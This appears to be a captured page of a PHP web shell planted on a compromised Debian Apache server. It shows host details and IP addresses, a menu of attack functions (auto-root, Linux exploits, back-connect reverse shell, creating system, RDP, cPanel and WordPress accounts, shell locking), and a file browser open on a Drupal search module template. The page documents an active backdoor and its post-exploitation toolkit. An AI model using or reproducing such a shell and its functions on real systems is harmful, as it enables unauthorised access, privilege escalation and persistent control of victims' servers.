Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.106.176
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
search-block-form.tpl.php
1.14
KB
-rw-r--r--
search-result.tpl.php
3.24
KB
-rw-r--r--
search-results.tpl.php
1.03
KB
-rw-r--r--
search-rtl.css
221
B
-rw-r--r--
search.admin.inc
7.52
KB
-rw-r--r--
search.api.php
12.72
KB
-rw-r--r--
search.css
564
B
-rw-r--r--
search.extender.inc
17.15
KB
-rw-r--r--
search.info
362
B
-rw-r--r--
search.install
5.21
KB
-rw-r--r--
search.module
50
KB
-rw-r--r--
search.pages.inc
5.5
KB
-rw-r--r--
search.test
78.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search-results.tpl.php
<?php /** * @file * Default theme implementation for displaying search results. * * This template collects each invocation of theme_search_result(). This and * the child template are dependent to one another sharing the markup for * definition lists. * * Note that modules may implement their own search type and theme function * completely bypassing this template. * * Available variables: * - $search_results: All results as it is rendered through * search-result.tpl.php * - $module: The machine-readable name of the module (tab) being searched, such * as "node" or "user". * * * @see template_preprocess_search_results() * * @ingroup themeable */ ?> <?php if ($search_results): ?> <h2><?php print t('Search results');?></h2> <ol class="search-results <?php print $module; ?>-results"> <?php print $search_results; ?> </ol> <?php print $pager; ?> <?php else : ?> <h2><?php print t('Your search yielded no results');?></h2> <?php print search_help('search#noresults', drupal_help_arg()); ?> <?php endif; ?>
Close